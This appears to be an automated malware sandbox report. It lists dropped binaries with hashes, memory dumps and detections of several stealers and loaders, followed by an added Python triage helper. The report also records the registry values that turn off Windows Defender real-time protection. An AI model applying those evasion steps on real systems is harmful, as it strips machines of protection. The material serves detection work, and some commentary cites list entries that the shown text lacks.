memory/1976-339-0x000007FEF5740000-0x000007FEF612C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CD82.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\CD82.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\2EE4.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/2668-359-0x0000000000400000-0x000000000046F000-memory.dmp

memory/2668-361-0x0000000000300000-0x000000000035A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4458.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/1660-373-0x0000000000020000-0x000000000003E000-memory.dmp

memory/1660-372-0x0000000000400000-0x0000000000431000-memory.dmp

memory/1216-377-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/1660-392-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/2668-393-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/2540-394-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/2668-395-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/1216-429-0x0000000000AD0000-0x0000000000AEE000-memory.dmp

memory/1216-434-0x00000000042E0000-0x0000000004320000-memory.dmp

memory/1660-433-0x00000000047A0000-0x00000000047E0000-memory.dmp

memory/2668-431-0x0000000004730000-0x0000000004770000-memory.dmp

memory/1216-430-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/2540-440-0x0000000000C40000-0x0000000001B6A000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2668-448-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/1660-447-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/2540-450-0x0000000070760000-0x0000000070E4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

memory/596-509-0x0000000002444000-0x0000000002457000-memory.dmp

memory/2784-506-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2784-508-0x0000000000400000-0x0000000000409000-memory.dmp

memory/596-510-0x0000000000230000-0x0000000000239000-memory.dmp

memory/2784-511-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2668-512-0x0000000004730000-0x0000000004770000-memory.dmp

memory/1660-513-0x00000000047A0000-0x00000000047E0000-memory.dmp

memory/1216-514-0x00000000042E0000-0x0000000004320000-memory.dmp

memory/2784-517-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1220-516-0x0000000003980000-0x0000000003996000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

memory/1340-555-0x0000000004090000-0x0000000004488000-memory.dmp

memory/1340-557-0x0000000004490000-0x0000000004D7B000-memory.dmp

memory/1340-556-0x0000000004090000-0x0000000004488000-memory.dmp

memory/1340-606-0x0000000000400000-0x000000000266D000-memory.dmp

memory/3008-620-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/3008-619-0x0000000001210000-0x0000000001726000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 972d9d852c38782a1c91f5f409fd89cd
SHA1 991976e7f2b10c669d9081be6596444573df6887
SHA256 7c7f38dd6587f12840c8b1f89353d1d0bdb381e2af48e9e3a1aba9dabc9303fc
SHA512 f7b8c3963e467e7e865850d64fa0b85e4011f55ecfcced23523daa86117725d2b0a6cc8740a56296aedf2e3eb1387aafc5431e4772cd501a933f562500c3b3d9

memory/2540-722-0x0000000070760000-0x0000000070E4E000-memory.dmp

memory/3008-721-0x0000000001150000-0x0000000001190000-memory.dmp

memory/3008-761-0x0000000000470000-0x0000000000471000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1162255db45aa2e18a50409ac2d84fda
SHA1 e16ac0e8065db3733d0c75162688b16afbe7b8c3
SHA256 0d210eb0efa26e915b37d7c9aade9a980e30987b7ee6d35de419aad84f4fe0bd
SHA512 6f5bf9526f9449f887564478963155eb193326468999a656603b882c26dcd31bbb4e47503dac5b403d2bd2cd259aedbfa8cc1f629889c3b49566a06b4037dfab

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 f1eaaf3b5849fe370148ae2f87803c39
SHA1 11cce46ccd6140a65eaf12b6e4c83beebf0ba85c
SHA256 1e498fb765c8045c23dfa8aee30305371cf475505000e80473f4be00ff124033
SHA512 3113a4de7aa5a4495a964518b6ceef1f3c4cd38cfe22041fb79eb71fb475c510c7352eeba977114fe0daef84675a58400d99b567e0f8ba6af47b7aefb1a66f1f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0b285adf6a663c6d9d8b2e25d4ee694d
SHA1 55ac4bea8bf7d29238ac6e19c913d6f13380bef3
SHA256 b5df96857056162fee75ac168a0d009ebdeb36fe5f672f1f53e822b6544c8496
SHA512 23b4194365659dbea122a4ee921b43e1dcc32278b4970d0a9ffd5d75d6da4c59789d514fd597637f7f4a785042cc8b1276da20784cfd611e8d14f67ded60cf89

memory/1976-910-0x000007FEF5740000-0x000007FEF612C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56090bddc200cb2ad34a28d724c5cf40
SHA1 c57b7d1da222b7776f44d73c15998d01ba097316
SHA256 3fc31aa44f03a7ea576203c64d0d49b96fb583261a6a91d7fff923b9160a907a
SHA512 f9a2db42355f9686d0300ed5d698d22430adf620ca9a5dd3da859ed27de4236a57f5b76e94ded4e99b71b704e2f08a9a8f35f3220f3db3965c9fcd4ae2964e38

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7d40faf881a562bfe7cc0be504f12216
SHA1 7b60a53ae5ae237dd467cfe99fd0fecbbe7dfb9d
SHA256 a20b2cda04b3e4dc7744d65d08d971688e36eb23ace1e7956a5328ac838df2bc
SHA512 998104d6d571d83580b96c124ec76acbffb4db7f3fdcde0ec0f3c9c37e6480851b5469fb22ea5baa26862dc4fa3a7100b504aefd34b1e5e15d5ce8ec334ef5b3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0fa1881fe360c343ca76be889bd09846
SHA1 b5ecda19949ef63fe0fe02387876924cf81e6e67
SHA256 1c4662ce8e801d5643f2ddc99e67b741a25de4fb70daa04a5ac5cae6f438e503
SHA512 f5d05f5883a08ef7dcf250cb6a9d982ad586248091912adbf2624b1cd3287edef3eea578e2b2483f5aaa4438b18f5d6485c8617cd1a73deec1c293f7271943f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 430f767f592ef1987ffc2bde8d09aa2b
SHA1 fbddbd9152157795319e5a369fb77316bb1dbb7b
SHA256 1b99d9c20f67238f5074f35e3c15699c71da383a94df30703287995009360660
SHA512 c0c9e7941ec6b27d2db8a4bad1eb045927c794d859da2dcf01f728975a8a00d87f1092e4cd4daadc1353ef35f3df1ffbad198909a885a00a6db38f3b3e7f14be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_7D28090A46C74E41A9A3E66B91EADD47

MD5 ca01438eb7b4ed4e0d143c4276072aac
SHA1 99a5758ec4a7e57d917ecde7111fc2e037731bd2
SHA256 0800ccc4431efa2edf777da4bbd32de945a086d93544ebe7f4ca49535e043add
SHA512 913d894fba0b51b81772f39f90eaf4a3eeb85764526e9ec38a96ceaa10e51abdd9d9e74a35d1c8a8106e1d582de0b0f2ddb3d6ba55cd7a76f25a020f35434880

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7c92fb2d6181427d8ab053266ffb3d8f
SHA1 678f7707915dd53e1437a1df00aa00a9b6a8e30e
SHA256 6201e2169dd4f70809cd6e54d59376bdb93badaf12593b0624d3e5f0b58ccb50
SHA512 ce29057a002b881c3368966a052ee7fc9f591cd3e75c6036f917477233a694205a398d7e610003cbdb2db6ee7723aaf03d2ef4196f0948aa6220c163af6df160

memory/1340-1273-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1340-1274-0x0000000004490000-0x0000000004D7B000-memory.dmp

memory/3008-1308-0x0000000070760000-0x0000000070E4E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc8ff2ccfb044ac480d7caf8ab4cf4dc
SHA1 6ec10c10f5fd3f7e0254e98d6a28f358387527ed
SHA256 2e0143868d0d19092c0efa4e858fe64a1085d23782d27db9a5d5aadd6fa20322
SHA512 1cd72d001fcb01d7d4227cd734b6620047f36ac06cdd5a4e5bef989515d0c386051a09de8bfc684be2fca205454637fb723ea21766cfd2fbd2e6bd9309ffa59f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5d861084345ba22b1047b46f852b5162
SHA1 266a5c51285fa13bc4381b5aae0c00a08ddc5582
SHA256 c6c1fe5cdc4e04c0d90e596500fbea40df2bc192b37f4962b7d7bb632686e215
SHA512 d07ff12523adf25dec4c9d70ef60219d9d6542b784bb6960cac0c3e2e25df1fe278eb2a10dda3ed42950ed2ecffd1694cbf537f250eda71a1aac7a6a4414bac5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2P314ZXV\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 00145157899528ffb5f1d20d3c713b79
SHA1 88751d7170934e037774e7e2f3db692101bf30e2
SHA256 85443e6c65997ea0d59dacbdec2fd4cdf1da6a7270b56b0e9afda0c6e2f7964e
SHA512 83d1b130ed99e4155194be93d134bf324592e021d92924e829f9b31dab7f87b32e4111a4fd5426237d80b96920bcb2bfe5965a8cb785fe6e933fdc390333d5d1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8fa01be33ab2fcc582110b407bd91832
SHA1 f4be951b4b2e55716f3e80eddfb4145c08abce2a
SHA256 044a60e5c061e00fcf50848a6862d6474e8ef91fdfcfd8dbd85692cb310dfefd
SHA512 779c9aa99f78883dc717d4fa81b979f73ec061e82de2074e6d9631250c85d6ed591835c224c9ba98fa50edad550ae9eba2ae015ea0106da58b12b9938c3b8702

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8fa01be33ab2fcc582110b407bd91832
SHA1 f4be951b4b2e55716f3e80eddfb4145c08abce2a
SHA256 044a60e5c061e00fcf50848a6862d6474e8ef91fdfcfd8dbd85692cb310dfefd
SHA512 779c9aa99f78883dc717d4fa81b979f73ec061e82de2074e6d9631250c85d6ed591835c224c9ba98fa50edad550ae9eba2ae015ea0106da58b12b9938c3b8702

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 657e3ecd54d1896fd65faddce5559c22
SHA1 8ccd25e971245b21bae11d90f95568e7d739038b
SHA256 83185c3e229230badad431a544b0d8782fd65f6cf3dc9f4c35f9ff8728aab0e5
SHA512 f12149360e5856c39ccbbf8f9bb056eda2e29bacbc8d0a722ea95f8cd0ecc2c96749e5362cd2277e8c37c38bbe93618bd1e0ddebefd982860ec1f10a0cca2853

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3f098b4f2410740dee516136e61e9025
SHA1 dee6ed83bc12a869e665bcbe8c880c192c04f8a0
SHA256 33264d22efaa6f0a944b32f76b1d8175478ecdd53acedfc39e28702af2eb439c
SHA512 ebf828b6efcb14102e0ca48a64a6fef65662139dff22daf22e91cef0b3a2be9e3e1a625b18418b6979dc18a2f02ab9d2265b41bfe4f9f31e7376c1b9f6245a82

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 139fa390c265b281327135a72696108a
SHA1 15a999824a688c1d69b7a8212c3cfef1738ac491
SHA256 14b252eec1db3dc344cc828ae85010b889ce5b75f55a67851fbe9bbc3b3ae6fb
SHA512 8449f261edfb7062bfc0b807a94e787538243ec9ab47040e0ae6c715601b0926e911c53d4b118fb488b8f79fcef29b972651b42f312aaef50d343087899e8ff9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c260e5686c9b68ded9c5a325f654770
SHA1 62ebfd525ce013a29b001998cc9c8f83d11525e8
SHA256 37d127ebf3860af46dde9139dd0c5c0eabf9c89729a4aece0a2adf84b4abaeaf
SHA512 f55eff57ad634677c94b42209dd8e9acc6119aaa3869e13519137ff3b56b2c9f60574719906934f4ef41953a7e4bcaeb3502c76e0579b865056f14ef3b7da032

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 959a57396c614c6afdb4b07cf6835276
SHA1 c966df9685f891b8c0d8f2175a5c89cf0f0fb1fe
SHA256 fdb2a47c5f77e54102ea9e5391bf361bb989a5f181a4681c818f3e32ca5acdc7
SHA512 033e12c4795d91911c7b8bf85ed92064f1b05f85a395adf60cc90d0c3c25e8c6d3825937d5d80e76e22fc5b03fef450940aa55d27de4c3bb4f250847d6917fbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2d436dddde0d047bcb19ae11fe6f0aa9
SHA1 97320f8ec01481dd46c7d8c7e81a960f187d7929
SHA256 d4c0bd84d506a2813685d9381dbac1f1b364cd8fae86de8547fa4292dbef6b6b
SHA512 db0986998338415b68d6cb4c076b0e163dce2b1b750d922ecb16f67f62f3b6e45e88844bbfe3fdd4d6fc8ecd14586baa1153269d923fab20317e80d86b944f0b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 13edabe6181db4f9849ff7ca6da1591b
SHA1 2f4ff120bbbc84b320f65690a804bfa91d64d039
SHA256 a2dfc0193842fe6f9ca7182bd43f62ac3a478084e57a6195f42d2981bada9600
SHA512 9a79cc06c7b8c50d22c1c7e12c7c07f85c185ee43b311bcbfb18b3a391afd3cc40af4bfd61014e64d822f2ebfe6c55f7f399ce4db72f57b3c78414e15b845336

memory/3008-1760-0x0000000001150000-0x0000000001190000-memory.dmp

memory/688-1721-0x000000013F480000-0x000000013FA21000-memory.dmp

memory/1340-1761-0x0000000000400000-0x000000000266D000-memory.dmp
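
The Files list above mixes three kinds of entries: binaries the sample dropped (explothe.exe, CD82.exe, 2EE4.exe, 4458.exe, cred64.dll, clip64.dll, toolspub2.exe and others), files Windows writes on its own in reaction to the sample's network activity (the CryptnetUrlCache MetaData entry is listed many times with different hashes because CryptoAPI rewrites its revocation cache; the Cab*.tmp/Tar*.tmp pair and the WinINet-cached .ico are the same kind of side effect), and memory/<pid>-<n>-<start>-<end> dump names. The Python below is an added triage helper written for this report, not part of the sandbox's tooling. It parses the report's own layout, collapses repeated listings by SHA256 (explothe.exe appears twice, once without its drive letter), lists paths that were rewritten with different hashes, and groups memory dumps by address range so that a region mapped identically into several processes stands out (0x70760000-0x70E4E000 appears above for PIDs 1216, 1660, 2540, 2668 and 3008). FILE_LIST and MEMORY_DUMPS are copied from this page; the split between Windows cache noise and dropped payloads (NOISE_PATTERNS) is an editorial heuristic that the report itself does not state.

```python
"""Triage of a sandbox "Files" list laid out as above. Added example for this
report, not the sandbox's tooling: FILE_LIST and MEMORY_DUMPS are copied from
the report; the cache/payload split (NOISE_PATTERNS) is an editorial heuristic."""
import re
from collections import defaultdict

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMDUMP = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")
# Assumption: written by Windows itself (CryptoAPI revocation cache, root-cert
# update Cab*/Tar* temps, WinINet cache) in reaction to the sample's network use.
NOISE_PATTERNS = [re.compile(p, re.I) for p in (
    r"\\CryptnetUrlCache\\", r"\\Temp\\(Cab|Tar)[0-9A-F]{4}\.tmp$", r"\\Content\.IE5\\")]
PAYLOAD_EXT = (".exe", ".dll", ".bat")

def normalise(path):
    """Some report paths lack the drive letter ('\\Users\\...')."""
    return "C:" + path if path.startswith("\\") else path

def parse_file_entries(text):
    """Path line followed by hash lines -> [{'path': ..., 'hashes': {...}}]."""
    entries = []
    for line in filter(None, map(str.strip, text.splitlines())):
        m = HASH_LINE.match(line)
        if m and entries:                      # hash lines without a path are ignored
            entries[-1]["hashes"][m.group(1)] = m.group(2).lower()
        elif not m:
            entries.append({"path": normalise(line), "hashes": {}})
    return entries

def classify(path):
    if any(p.search(path) for p in NOISE_PATTERNS):
        return "windows-cache"
    return "dropped-payload" if path.lower().endswith(PAYLOAD_EXT) else "other"

def unique_payloads(entries):
    """SHA256 -> sorted paths, payloads only; repeated listings collapse."""
    by_hash = defaultdict(set)
    for e in entries:
        if classify(e["path"]) == "dropped-payload" and "SHA256" in e["hashes"]:
            by_hash[e["hashes"]["SHA256"]].add(e["path"])
    return {h: sorted(p) for h, p in by_hash.items()}

def rewritten_paths(entries):
    """Paths seen with more than one SHA256 (file rewritten during the run)."""
    seen = defaultdict(set)
    for e in entries:
        if "SHA256" in e["hashes"]:
            seen[e["path"]].add(e["hashes"]["SHA256"])
    return {p: len(h) for p, h in seen.items() if len(h) > 1}

def shared_regions(dump_names):
    """memory/<pid>-<n>-<start>-<end>: ranges dumped from two or more PIDs."""
    regions = defaultdict(set)
    for m in filter(None, map(MEMDUMP.search, dump_names)):
        pid, _, start, end = m.groups()
        regions[(int(start, 16), int(end, 16))].add(int(pid))
    return {r: sorted(p) for r, p in regions.items() if len(p) >= 2}

FILE_LIST = r"""
\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5 d032f5665f5b845467e640e31b525eef
SHA256 6f7edd40cc736d1249bfcfa35288b1321f6743ecaca94a1167e9a7665fe237b0
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5 37495208bfd1c98416d7c1334032e7cf
SHA256 dceaa36f106bd17bda057d238a58bb671f91d678d0a78bb88e62f23cc0808df8
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
"""
MEMORY_DUMPS = """
memory/1976-186-0x00000000008D0000-0x00000000008DA000-memory.dmp
memory/1216-377-0x0000000070760000-0x0000000070E4E000-memory.dmp
memory/1660-392-0x0000000070760000-0x0000000070E4E000-memory.dmp
memory/2668-393-0x0000000070760000-0x0000000070E4E000-memory.dmp
memory/2540-394-0x0000000070760000-0x0000000070E4E000-memory.dmp
memory/3008-620-0x0000000070760000-0x0000000070E4E000-memory.dmp
memory/2668-359-0x0000000000400000-0x000000000046F000-memory.dmp
memory/2668-395-0x0000000000400000-0x000000000046F000-memory.dmp
""".split()

if __name__ == "__main__":
    ents = parse_file_entries(FILE_LIST)
    print(len(ents), "entries,", len(unique_payloads(ents)), "unique payloads")
    print("rewritten during run:", rewritten_paths(ents))
    for (s, e), pids in shared_regions(MEMORY_DUMPS).items():
        print(f"0x{s:X}-0x{e:X} ({e - s:#x} bytes) dumped from PIDs {pids}")
```

The region check deliberately ignores a range dumped twice from the same PID (0x400000-0x46F000 in PID 2668 above): only ranges common to two or more processes are returned, which is what separates a shared module from one process's own image being dumped at two points in time.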

Analysis: behavioral2

Detonation Overview

Submitted 2023-10-10 20:34
Reported 2023-10-10 20:54
Platform win10v2004-20230915-en
Max time kernel 102s
Max time network 163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\4824.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A (8 matches, no indicator or process recorded)

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86D5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4563.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4AD4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\436D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4563.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4824.exe N/A
